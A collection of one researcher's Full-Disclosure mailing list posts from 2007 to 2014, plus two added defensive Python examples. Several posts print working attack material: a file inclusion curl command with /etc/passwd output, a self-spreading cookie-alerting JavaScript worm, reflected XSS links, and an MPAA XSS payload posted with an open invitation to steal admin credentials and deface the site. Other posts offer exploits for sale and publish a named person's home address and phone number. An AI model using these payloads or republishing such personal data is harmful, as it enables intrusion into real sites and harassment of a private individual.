Re: [Full-disclosure] Bank of the West security contact?
Just wanted to post a follow-up to this and provide some context to make it known:

* Bank of the West was contacted in 2011 to report a security issue
* No response for 2 years
* In late 2013, I receive a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details.

Conclusions?

* Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM
* Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell

You should know this if you are an existing or potential customer / employee of Bank of the West...

On Fri, Feb 7, 2014 at 9:27 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote:
> Anyone have security contact at Bank of the West?
> --
> Kristian Erik Hermansen
> https://www.linkedin.com/in/kristianhermansen
> https://profiles.google.com/kristian.hermansen

--
Regards,
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://google.com/+KristianHermansen
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Hacking Exposed: Virtualization Cloud Computing: Secrets Solutions
Anyone know?

-- Forwarded message --
From: Kristian Erik Hermansen kristian.herman...@gmail.com
Date: Thu, Mar 13, 2014 at 1:13 PM
Subject: Hacking Exposed: Virtualization Cloud Computing: Secrets Solutions
To: dailydave dailyd...@lists.immunityinc.com, dailyd...@lists.immunitysec.com

Does anyone know if this book exists or has ever been released? Seems mythically unicorn-like and The Hoff didn't seem to have an answer either :)

1 Used from $742.67???
http://www.amazon.com/gp/product/B00BZTW7E2/ ...

--
Regards,
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://google.com/+KristianHermansen
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
On Fri, Oct 12, 2007 at 6:55 PM, valdis.kletni...@vt.edu wrote:
> What should this hypothetical extension do if it automagically redirects http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me.

Hello from the future! This hypothetical extension would handle such cases...and will eventually be called HTTPS Everywhere :) [1]

Keep an eye out for it in a few years...

[1] https://www.eff.org/https-everywhere

--
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://google.com/+KristianHermansen
[Full-disclosure] Bank of the West security contact?
Anyone have security contact at Bank of the West?

--
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristian.hermansen
Re: [Full-disclosure] New DDoS attack vector
On Thu, May 19, 2011 at 7:24 PM, Dobbins, Roland rdobb...@arbor.net wrote:
> The assertion that 'previous Denial of Service attacks against the DNS servers received either malformed, fragmented, ICMP messages or TCP SYN, with invalid length, or oversized and some of these can be filtered by the firewalls or security appliances' is demonstrably false. DNS servers have been targeted by bogus queries intended to exhaust the DNS server resources directly, or via spoofed queries which are intended to generate reflection/amplification attacks, but which also have a deleterious effect on the performance of the abused open recursors, for many years.
>
> The posited scenario is unnecessarily complex. It's a heck of a lot easier to simply bombard targeted authoritative DNS servers with spoofed bogus queries from botnets and/or hit them with reflection/amplification attacks, rather than go through these elaborate steps of registering a domain, pointing the NS/MX records at the target, then generating lots of spam.
>
> The proximate attack method described - layer-7 DDoS via excessive queries - isn't new or unique, and the NS-record-related steps are unnecessary. There's simply no need to go to this amount of trouble to launch a DDoS attack against authoritative DNS servers, nor is such an attack as difficult to defend against as is claimed in the write-up, meaning that this attack methodology has no unique advantages to justify the extra steps regarding re-targeting NS/MX records and spam generation.

Agreed. But I have seen this exact attack in action too, so it is being used effectively to cripple DNS servers. Whether or not the attacker chooses this method or the botnet vector, the more interesting aspect is what happens when a DNS server's cache hit ratio vastly decreases while this attack is in progress. From my specific calculations during a known attack of this type, a DNS server cluster was reduced in efficiency to 10% of the expected normal operating capacity. Losing 90% of your expected DNS capacity will ruin anyone's day especially during lunch time when DNS queries peak.

The in-real-time fix is very simple and can be done in one iptables command. However, if you were really smart, you would buy Arbor to get very specialized DNS protection out-of-the-box. They have some DNS protocol-specific options that block/limit clients during these types of attacks. Go Arbor...

--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
Re: [Full-disclosure] New DDoS attack vector
On Fri, May 20, 2011 at 4:29 AM, Balder balder.theglori...@googlemail.com wrote:
> * Why go to all this trouble when you could just do something like the following (replacing dig with something faster) -
>
> while true ; do dig $(/dev/urandom tr -dc A-Za-z0-9 | head -c 10 ).example.com MX ; done

dnsperf is what you really want ;)

--
Kristian Erik Hermansen
[Full-disclosure] Google Urchin LFI (Local File Include) vulnerability
While fuzzing an Urchin web application, I discovered what appears to be an LFI vulnerability. Neither Secunia nor Google / Urchin appear to have reported this as a known issue. The problem lies in the gfid parameter passed to urchin.cgi. This was tested on a somewhat modified version of Urchin 5.7.03, but it appears that the gfid param can be influenced given the results. I don't have the ability to test further, but this appears valid and unpublished. Can anyone confirm they see similar behavior in the same version or other versions?

PoC:

$ curl -s -b '...cookie_data...' 'https://host/path/urchin.cgi?profile=...rid=13cmd=svggfid=/../../../../../../../../../../../etc/passwd%00.htmlie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...

--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
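Added example, not part of the original post and not Urchin's code: the report above describes a file-selecting parameter (gfid) that accepted ../ sequences and a %00 byte placed ahead of the expected suffix. The Python sketch below shows how a handler can resolve such a parameter defensively. The base directory, the allowed characters and suffixes, and all function names are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Assumptions for this sketch: file ids are relative paths built from these
# characters only, and only these suffixes are ever served.
SAFE_ID = re.compile(r"[A-Za-z0-9_\-./]+")
ALLOWED_SUFFIXES = (".html", ".svg")


class UnsafePath(ValueError):
    """The requested file id must not be served."""


def resolve_file_id(base_dir, raw_value):
    """Map a percent-encoded request value to a path inside base_dir.

    Raises UnsafePath instead of returning anything outside base_dir.
    """
    value = unquote(raw_value)  # decode exactly once, never again later

    # 1. Character allowlist. This rejects the NUL byte produced by %00,
    #    a '%' left over from double encoding, backslashes and the like.
    if not SAFE_ID.fullmatch(value):
        raise UnsafePath("illegal character in file id")

    # 2. Suffix check on the whole decoded value. With NUL already rejected,
    #    the suffix seen here is the suffix the filesystem will see.
    if not value.endswith(ALLOWED_SUFFIXES):
        raise UnsafePath("unexpected file type")

    # 3. Containment check after canonicalisation. realpath() collapses
    #    ".." segments and resolves symlinks before the comparison.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("path escapes base directory")
    return candidate


def classify(base_dir, raw_value):
    """Return 'allowed' or the reason the value was refused."""
    try:
        resolve_file_id(base_dir, raw_value)
        return "allowed"
    except UnsafePath as exc:
        return str(exc)


def demo():
    """Run constructed sample values through the check."""
    samples = [
        "reports/summary.html",                                   # normal request
        "/../../../../../../../../../../../etc/passwd%00.html",  # value from the post
        "../../outside.html",                                     # traversal, valid suffix
        "reports%252f..%252fx.html",                              # double-encoded
        "/etc/passwd",                                            # wrong file type
    ]
    with tempfile.TemporaryDirectory() as base:
        return {s: classify(base, s) for s in samples}


if __name__ == "__main__":
    for value, verdict in demo().items():
        print(f"{verdict:32} {value}")
```
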
[Full-disclosure] Google Apps CSRF vector, email disruption
Hello Google et al,

I have devised a proof-of-concept via Cross-Site Request Forgery that allows arbitrary unvalidated attackers to disrupt Google Apps email on any domain. For my time and research into this issue, I am offering to sell the vulnerability to you at a fair price compensation, within the next week. If I do not receive an offer to purchase prior to June 14, I will presume that you are not interested in patching this vulnerability or acquiring my intellectual property. At that time, I will sell it on the open market. Please let me know how you would like to proceed.

Regards,
--
Kristian Erik Hermansen
[Full-disclosure] Google Buzz and blind CSRF attacks
Greetings,

Google Buzz is an incredibly useful new social networking service. However, it is also quite vulnerable to persistent CSRF attacks when data is pulled from external data feeds. For instance, I encourage you to follow me on Google Buzz by utilizing my profile below and clicking FOLLOW. You can probably also search for me in Google Buzz's interface within GMail as well.

http://www.google.com/profiles/kristian.hermansen
http://kristian-hermansen.blogspot.com/2010/02/google-buzz-csrf-test.html

My proof-of-concept merely executes a denial of service against Google Buzz users for which the only recovery is to disable IMG tag loading, reload Google Buzz, and either mute the posting or unfollow me permanently. This is non-intrusive PoC to demonstrate weaknesses and the ever-increasing need to protect against CSRF attacks. I hope you enjoy the demonstration.

Cheers,
--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
Re: [Full-disclosure] Google Buzz and blind CSRF attacks
On Fri, Feb 12, 2010 at 7:08 AM, Cody Robertson c...@hawkhost.com wrote:
> Doesn't work for me

It has been verified against multiple GMail users. You can try the direct link as well, but the issue is more effective within the Buzz interface. It doesn't look like you tested from a gmail account either (hawkhost.com?)...

http://kristian-hermansen.blogspot.com/2010/02/google-buzz-csrf-test.html

--
Kristian Erik Hermansen
[Full-disclosure] Intercepting Southern California Gas Company user credentials... (socalgas.com)
...should be pretty easy ;-) Company has been notified many times privately of this issue, but they appear incompetent. Time for public shaming.

$ sslscan myaccount.socalgas.com | grep NULL
Accepted  SSLv3  0 bits  NULL-SHA
Accepted  SSLv3  0 bits  NULL-MD5
Accepted  TLSv1  0 bits  NULL-SHA
Accepted  TLSv1  0 bits  NULL-MD5

NULL cipher SSL/TLS presents the illusion of security and customers should be aware that their credentials are easily intercepted. Wanna shut off someone's gas in Los Angeles? :-)

--
Kristian Erik Hermansen
[Full-disclosure] Avocent exploit for sale
Hello!

Please contact me if you are interested in purchasing an exploit for Avocent KVM devices. Tested on a few models, including DSR2035. I have references.

Regards,
--
Kristian Erik Hermansen
[Full-disclosure] Inquira: Multiple Vulnerabilities
Bonjour,

During a recent penetration test, we discovered and worked with Inquira to close numerous web-based issues. The vendor has not replied back about a formal release of these issues, so I am posting this notice here to inform customers to check for an update for their products. You can contact Inquira via the link below.

http://www.inquira.com/

Additionally, it is also advised that customers change the default passwords used by the affected software. For instance, the default Apache Tomcat administrator account details are listed below and should probably be added to publicly listed default password databases (phenoelit, etc).

Vendor: Inquira
Products: (multiple)
Username: inquira
Password: inquira123

Cheers,
--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianerikhermansen
[Full-disclosure] F4c3b00k Worm
Seems to be able to spread via automated status messages. When another user sees the hijacked status message, they are likely to execute the status updater payload as well, which then spreads to anyone else who can see those status updates. This document.cookie payload is benign. Emulation is achieved by pasting the payload below into Firefox while on the profile.php page...

javascript:var p='profile_id='+document.getElementById('profile_id').value+'status=scriptalert(document.cookie);/script'+'profile=true'+'test_name=INLINE_STATUS_EDITOR'+'action=OTHER_UPDATE'+'post_form_id='+document.getElementById('post_form_id').value;hr=new XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST', 'updatestatus.php', true);hr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length', p.length);hr.setRequestHeader('Connection', 'close');hr.send(p);

--
Kristian Erik Hermansen
Have you tried Session Destroyer yet?
http://kristian.hermansen.googlepages.com/session.destroyer.html
[Full-disclosure] Announcing Session Destroyer -- Invalidate your webapp logins with ease!
The art of Crowd SuRFing the masses. This proof-of-concept handles most of the Alexa Top 100 websites that require logins. Mainly just US sites for now, but more will be added later. If you pull this into an IFRAME on your site, you can mess with lots of people. Nothing new. Just something fun for the season. Cheers and happy holidays :-)

http://kristian.hermansen.googlepages.com/session.destroyer.html

--
Kristian Erik Hermansen
Have you tried Session Destroyer yet?
http://kristian.hermansen.googlepages.com/session.destroyer.html
[Full-disclosure] Health website vulnerable to hacking, no response from admins after multiple attempts
I tried repeatedly to contact them. For the benefit of the health patients using this website, can someone please investigate? Thanks...

https://secure.westclifflabs.com/secure/billing/default.asp

--
Kristian Erik Hermansen
[Full-disclosure] Oracle DB security contact email address?
Anyone have it?
Re: [Full-disclosure] Google GrandCentral XSS 0day
On Sun, Jun 1, 2008 at 1:00 PM, Kristian Erik Hermansen [EMAIL PROTECTED] wrote:
> Enjoy...
>
> http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords=

Google has seemingly fixed this 0day in under 12 hours. Congrats to our boys at the GOOG...

--
Kristian Erik Hermansen
--
When you share your joys you double them; when you share your sorrows you halve them.
[Full-disclosure] Google GrandCentral XSS 0day
Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords=

--
Kristian Erik Hermansen
--
When you share your joys you double them; when you share your sorrows you halve them.
[Full-disclosure] Google GrandCentral XSS 0day
Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords=

--
Kristian Erik Hermansen
--
When you share your joys you double them; when you share your sorrows you halve them.
[Full-disclosure] Andrew A - Benjamin Trott, Six Apart/Live Journal hacker, and belligerent anti-gay remarks?
After the recent death of Justin Polazzo -- a dude who I only corresponded with over the net -- I noticed another post from Andrew A, which touted some horrible remarks. I don't know who Andrew A is, but he and I have had a running conversation publicly and privately. He has proven to be quite immature. I can offer some knowledge that he has provided to me privately to point at who it might be, but I make no guarantee to who the individual is. It is merely from his mouth. He wanted to meet me at the art gatherings in San Francisco's 20GOTO10, and give me a piece of his mind. He called me a pussy faggot when I did not attend Christopher Abad's showing of ASCII art on those dates. Following is some insight that may help some people on this list track down who this Andrew A is. It is a very sad day when we lose someone in real life and we must all rethink what is happening in our security community when people take pride in laughing at such loss of life. The Internet may just be the flicking of electrons passing around in an invisible flux, but the people at the edge of our networks are real. We must treat them with the same respect we would treat others with in person. We must forgive. We must forget. We must do our best to unite our communities rather than divide them. We have all made our own mistakes in the past, so let's continue our journey with a new goal -- that of trying to be good to one another in real life and online, despite its virtualness. We must do that. I have hope that we can accomplish decency online... http://www.kristian-hermansen.com/wordpress/2008/02/11/benjamin-trott-and-belligerent-anti-gay-remarks/ Benjamin Trott is an American entrepreneur living in California. He is known for co-founding Six Apart (6 Apart, or 6A), which later purchased Live Journal. However, online, it appears that he may be acting under a pseudonym as Andrew A ([EMAIL PROTECTED], gluttony). It all started back in December in San Francisco. 
An observation of mine regarding fetching favicon images in certain contexts, which many people I have spoken to consider a bug in some web browsers, turned into a flame-war on the full disclosure list and many accusations were flying. However, the discussion continued off-list privately where Andrew A continued with belligerent and even anti-gay remarks. It is just disgusting that someone of this stature would expend so much energy and hatred. I just want it to stop, but this person, whom I believe is Benjamin Trott, continues to harass me and it is unwarranted. Please stop and grow up Andrew A ([EMAIL PROTECTED]). The purported Andrew A claims to live at this residence, perhaps with his wife Mena G. Trott: 4338 26th street, San Francisco, CA His phone number appears to be (415) 821-2073. Andrew A should just quit this silliness and apologize. I felt the need to post this information in the case that others have been harassed by this individual. Delivered-To: [EMAIL PROTECTED] Received: by 10.141.98.17 with SMTP id a17cs38059rvm; Fri, 14 Dec 2007 14:14:31 -0800 (PST) Received: by 10.150.155.1 with SMTP id c1mr1361744ybe.85.1197670470807; Fri, 14 Dec 2007 14:14:30 -0800 (PST) Received: by 10.151.12.9 with HTTP; Fri, 14 Dec 2007 14:14:30 -0800 (PST) Message-ID: [EMAIL PROTECTED] Date: Fri, 14 Dec 2007 14:14:30 -0800 From: Andrew A To: Kristian Erik Hermansen Subject: Re: Mr. Andrew Anonymous In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=―-=_Part_751_2843694.1197670470804″ References: [EMAIL PROTECTED] ――=_Part_751_2843694.1197670470804 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I live out of Orange County but I visit the bay for business and pleasure. No way am I gonna roll to Baysec or Berksec though. Do I look like a clueless wannabe faggot like you? I may be at the 20goto10 ansi show, but I'll definitely be at the buttes 20goto10 show. See you there. 
I'll introduce myself. Delivered-To: [EMAIL PROTECTED] Received: by 10.100.226.20 with SMTP id y20cs604319ang; Sun, 10 Feb 2008 11:00:03 -0800 (PST) Received: by 10.78.193.5 with SMTP id q5mr27381979huf.4.1202670001651; Sun, 10 Feb 2008 11:00:01 -0800 (PST) Received: by 10.78.29.5 with HTTP; Sun, 10 Feb 2008 11:00:01 -0800 (PST) Message-ID: [EMAIL PROTECTED] Date: Sun, 10 Feb 2008 11:00:01 -0800 From: Andrew A To: Kristian Erik Hermansen Subject: Re: Mr. Andrew Anonymous In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=―-=_Part_26650_5443580.1202670001597″ References: [EMAIL PROTECTED] [EMAIL PROTECTED] ――=_Part_26650_5443580.1202670001597 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I didnt see you at either 20goto10 show. pussy faggot. 4338 26th street, san francisco ask for ben. fuck you. Delivered-To: [EMAIL PROTECTED] Received: by 10.141.156.14 with SMTP id i14cs18074rvo; Sun, 10 Feb 2008 16:29:13 -0800 (PST
Re: [Full-disclosure] RIP Dude VanWinkle
This news saddens me greatly. Justin and I had plans to meet up at SPICON in Atlanta just a few months ago, but he bailed out and never came down. Was he a bit shy of social gatherings? I told him that a group of us would be getting dinner and drinks, but I never heard back from him. He finally responded a week later, after the conference, saying he was busy. Does anyone know the cause of death? It's really a bummer :-(

The dude abides...

And I'm talkin' about the Dude here -- sometimes there's a man who, well, he's the man for his time'n place, he fits right in there -- and that's the Dude,

--
Kristian Erik Hermansen
Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 12, 2007 9:01 PM, Andrew A [EMAIL PROTECTED] wrote:
> PPS-- Namedropping the head of a project you plagiarized from in your cover letter is not good policy. Especially in this industry. It's a smaller world than most, and now you're blackballed buddy. You'll work as desktop support at FOX forever. On this list you may act like the lack of credit was some sort of forgetful slip, but most people have been relayed by now that you directly claimed authorship of said shellcode in an interview.

Andrew, you certainly are misinformed. I did not claim authorship for anything, as you say. I don't even know who this individual is that you are talking about. The only thing I can think of that you have mentioned is something I put together for H D Moore and the metasploit team to resolve the licensing issues for getting msf3 into Ubuntu's multiverse repository. You can see the full efforts of this, and some of my code, at the link below...

https://bugs.launchpad.net/ubuntu/+bug/102212

Some stuff was sent to the msfdev list as well, so if you are on that team, you would know. All I wanted to do was clean up the msf3 code to meet Debian package specifications. However, it was not possible to get msf3 into Debian/Ubuntu without violating the Metasploit license. H D did say they may rewrite the license in a future version.

Even if I mentioned this msf3 effort during an interview, and I don't even recall if I did, then your point is still moot. I tried to do something for the community of users who run msf on Linux, which was make metasploit more accessible to them. If you think that's bad, then that's fine. This whole discussion started with presenting the fact that the favicon issue could be a useful attack vector that people may not have thought of before.

I can't change the fact that people in the security community will always be hostile. There is something about this community, and it doesn't happen like this anywhere else, where people can be just so belligerent. I try to have fun and have a good time in/out of work, and maybe you don't know that about me. I am light-hearted and enjoy the company of my peers. Ask anyone who has had a drink with me, or even too many drinks! We always have fun. Even if I poke fun at people, it is usually in a fair way, showing reason to feel that way. Your attitude is based on things which are made up, false, and you have no base to stand on with such hostility.

Just turn that frown upside-down and remember that life shouldn't be so serious. Take it easy and have fun. It is not the end of the world. I will buy some beers to chill your hot head if you like...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 12, 2007 9:01 PM, Andrew A [EMAIL PROTECTED] wrote:
> Actually, the suggested prevention tactic is to create a post variable in your form of type hidden with a securely generated one-time ticket that an attacker would not be able to scrape without performing an xmlhttp call, therefore signalling a (real) security problem with the app in question. Requiring the user to re-input their login credentials for every database write would be absolutely ridiculous from both a design and security perspective. But then again, you must know all this with your extensive experience in web app security and development.

Yeah dude, we would call that a nonce. Your definition is fine too though...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
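Added example, not part of the original thread: the hidden-field one-time ticket (nonce) discussed in the message above, sketched in Python as a server-side store that issues a ticket per form render and accepts it once. The class, the csrf_ticket field name, the 15-minute lifetime and the in-memory storage are assumptions for illustration.

```python
import hmac
import html
import secrets
import time


class TicketStore:
    """Per-session one-time tickets for state-changing form posts."""

    def __init__(self, ttl_seconds=900, clock=time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock          # injectable so expiry can be tested
        self._pending = {}           # session_id -> {ticket: expiry time}

    def issue(self, session_id):
        """Create an unguessable ticket bound to one session."""
        ticket = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._pending.setdefault(session_id, {})[ticket] = self._clock() + self._ttl
        return ticket

    def hidden_field(self, session_id):
        """HTML for the hidden post variable carrying a fresh ticket."""
        value = html.escape(self.issue(session_id), quote=True)
        return '<input type="hidden" name="csrf_ticket" value="%s">' % value

    def redeem(self, session_id, submitted):
        """True only for an unexpired, unused ticket of this session."""
        tickets = self._pending.get(session_id, {})
        supplied = (submitted or "").encode("utf-8")
        match = None
        for ticket in tickets:
            # Constant-time comparison avoids leaking how many leading
            # characters of a guess were correct.
            if hmac.compare_digest(ticket.encode("ascii"), supplied):
                match = ticket
        if match is None:
            return False
        expiry = tickets.pop(match)  # single use: gone even if it had expired
        return self._clock() <= expiry


def handle_post(store, session_id, form):
    """Return an HTTP status for a state-changing request (hypothetical handler)."""
    if not store.redeem(session_id, form.get("csrf_ticket")):
        return 403   # forged, replayed, expired or cross-session request
    return 200       # the database write would happen here


if __name__ == "__main__":
    store = TicketStore()
    print(store.hidden_field("session-alice"))
    t = store.issue("session-alice")
    print(handle_post(store, "session-alice", {"csrf_ticket": t}))  # accepted
    print(handle_post(store, "session-alice", {"csrf_ticket": t}))  # replay refused
```
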
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 11, 2007 3:01 PM, Aaron Katz [EMAIL PROTECTED] wrote:
> My strong suspicion is that the original poster simply created a JavaScript script in somewhere.google.com, and this JavaScript deleted the cookie. This would work if the session cookie is restricted to google.com, which would let any web server in, or content served from the google.com domain (or any subdomain). My note about using NoScript to restrict JavaScript execution to mail.google.com reinforces this suspicion.
>
> If my suspicion is correct, then google did two things. First, google appears to allow individuals to create personal domain names in google.com, and to place arbitrary content in those domains. This first thing probably allowed the original poster to place the JavaScript in a location where it could access the google.com cookie. Second, google apparently did not restrict the gmail cookie to mail.google.com. This second thing allowed the JavaScript from the personal system at somewhere.google.com to access the cookie.
>
> Of course, I only did a cursory glance at the source of the webpage, so I may be wrong :) But, we can be reasonably sure it's not exploiting a problem in the browser, since the issue appears to be cross browser.

Well, let me just say that NoScript will not save you here in my example. Try this to see how to really mess with your brain...

* Open Firefox 2.x (delete all cookies/cached objects if you like, etc)
* Check an email in Google
* Visit my PoC code page in a new tab
* Click on the Google tab and try to read an email
* Something went wrong...
* Log back into Google
* Browse around your email, or not, doesn't matter
* Merely click on the tab for my PoC webpage
* Something goes wrong again...

Just clicking a tab in Firefox can mess with your Google account? Details will be released this Friday and will also include an exploit for Yahoo as well. Fair warning...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 11, 2007 6:25 PM, coderman [EMAIL PROTECTED] wrote:
> favicons are handy ... even if handled quite differently between browser types/versions.

Bingo to coderman, the only security dude here who gets it. You would be surprised the number of ridiculous personal emails I got regarding this issue. Crowd SuRFing is here to stay...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 7, 2007 7:40 AM, Aaron Katz [EMAIL PROTECTED] wrote:
> Could you please explain the vulnerability? When I test, and I submit a correct response to the CAPTCHA, I'm presented with knowledge based authentication.

The bug, unless Google fixed it already, will have an effect on your GMail account, but has nothing to do with CAPTCHAs. Here is an illustration:

* You are happily browsing some emails in GMail.
* You then visit any website which utilizes my PoC. (one @ http://www.kristian-hermansen.com)
* You try to use your GMail account, but something went wrong.
* You ask yourself what happened...

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 7, 2007 9:41 PM, Joseph Hick [EMAIL PROTECTED] wrote:
> could someone please explain how this PoC works? I wonder why simply loading an image logs me out

A paper will be presented next week on the topic of Crowd SuRFing...please wait until that time :-)

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
[Full-disclosure] Google / GMail bug, all accounts vulnerable
Proof of concept here...

http://www.kristian-hermansen.com

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] 0day XSS for MPAA.org
On Dec 5, 2007 12:15 PM, [EMAIL PROTECTED] wrote:
> Ol? Kristian Hermafroditas you useless fagot, shoes of clown are apparent.

Dude, you criticize everyone with the same hatred and bad english. Check out what you said about security researcher, and woman, Raven Adler just a few months ago.

snip
> b?sicamente can you comment in the rumors that alike to the vast majority of female investigators of the security you used to be a man? beyond that on the rumors that with you shoes of clown are apparent and jacket sports is being worn ?
/snip

http://techlists.org/archives/security/fulldisclosure/2007-04/msg00336.shtml

Ham Beast -- just take it easy, OK champ? You are probably the same guy in the seated conference crowd that shouted nasty things to Raven after her laptop was compromised by some unfortunate soul. 0day can happen to anyone ... lighten up ... we're all friends here :-) There is no need to bash other people just to bash other people. At least back up your claims with some factual evidence. For instance, why does Raven, as you say, wear clown shoes?

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
[Full-disclosure] Internet Explorer Vuln Report, Debunked [Jeff R. Jones is becoming FUD-master]
Jeff R. Jones, a director of security strategy for Microsoft, has issued another report on the security of Internet Explorer as compared to Mozilla Firefox. Now, we all understand that any software product will have security issues, but Mr. Jones bases his analysis on the fact that Mozilla patches more frequently. See the report here on his blog.

http://blogs.technet.com/security/archive/2007/11/30/download-internet-explorer-and-firefox-vulnerability-analysis.aspx

I have refuted the claims of a previous report on Microsoft Vista, but instead of doing that again, I think the following excellent quote sums up the entire analysis done by Mr. Jones - Just because dentists fix more teeth in America doesn't mean our teeth are worse than in Africa.

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
[Full-disclosure] 0day XSS for MPAA.org
As many of you have heard, the MPAA themselves are violating the GNU GPL. Such hypocrisy from a company which claims they adhere to copyrights :-) In protest, I took exactly 7 seconds to locate an XSS in their website and am posting it for your perusal. Maybe someone can use it in an email to an MPAA staff member, and perhaps can modify the payload to steal credentials for some MPAA admin interface. And perhaps then, after gaining MPAA credentials, this person can modify the MPAA website. And perhaps after that, we can all laugh at the MPAA yet again in their quest to sue 12 year old kids for downloading MP3 files...

There are many more XSS on their site. Everyone knows that if you find one bug on top (without much effort), there are many more security issues hiding beneath the surface. I leave it up to the MPAA-haters out there to dig deeper and use it to influence the MPAA website...

Here's one for the 'txtsearch' search field on the main page at MPAA.org in the top right-hand corner where it says 'Find the rating of a film'...

ERR/tr/table/tdscriptalert('xss');/script

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
Re: [Full-disclosure] Signature or checksum?
On Dec 2, 2007 7:00 AM, coderman [EMAIL PROTECTED] wrote:
> p.s. for the tin foil hat crowd, those digital sigs are looking weaker every year compared to cryptographic hash functions and block ciphers:
> http://dwave.wordpress.com/2007/11/26/slides-from-sc07-progress-in-quantum-computing-panel/
> not to mention GNFS improvements the last few years...

Don't forget Galois group and Fermat surface research :-P

--
Kristian Erik Hermansen
I have no special talent. I am only passionately curious.
[Full-disclosure] MD5 algorithm considered toxic (and harmful)
I know of many commercial security products which still utilize MD5 to prove integrity of the data they distribute to customers. This should no longer be considered appropriate. Now that tools are readily available to exploit newer MD5 collision research, I think it is safe to say that the public should retire its usage for good. Read the most recent research regarding chosen-prefix collisions:

http://www.win.tue.nl/hashclash/EC07v2.0.pdf

A concrete example for your perusal:

[EMAIL PROTECTED]:/tmp$ wget http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
--04:36:32-- http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
= `HelloWorld-colliding.exe'
Resolving www.win.tue.nl... 131.155.70.190
Connecting to www.win.tue.nl|131.155.70.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41,792 (41K) [application/octet-stream]
100%[] 41,792 109.16K/s
04:36:33 (108.92 KB/s) - `HelloWorld-colliding.exe' saved [41792/41792]

[EMAIL PROTECTED]:/tmp$ wget http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe
--04:36:37-- http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe
= `GoodbyeWorld-colliding.exe'
Resolving www.win.tue.nl... 131.155.70.190
Connecting to www.win.tue.nl|131.155.70.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41,792 (41K) [application/octet-stream]
100%[] 41,792 127.20K/s
04:36:38 (126.82 KB/s) - `GoodbyeWorld-colliding.exe' saved [41792/41792]

[EMAIL PROTECTED]:/tmp$ ls -lsha *.exe
44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08 GoodbyeWorld-colliding.exe
44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08 HelloWorld-colliding.exe

[EMAIL PROTECTED]:/tmp$ strings HelloWorld-colliding.exe | tail
SetFilePointer
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
SetStdHandle
CloseHandle
KERNEL32.dll
Hello World ;-)

[EMAIL PROTECTED]:/tmp$ strings GoodbyeWorld-colliding.exe | tail
SetFilePointer
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
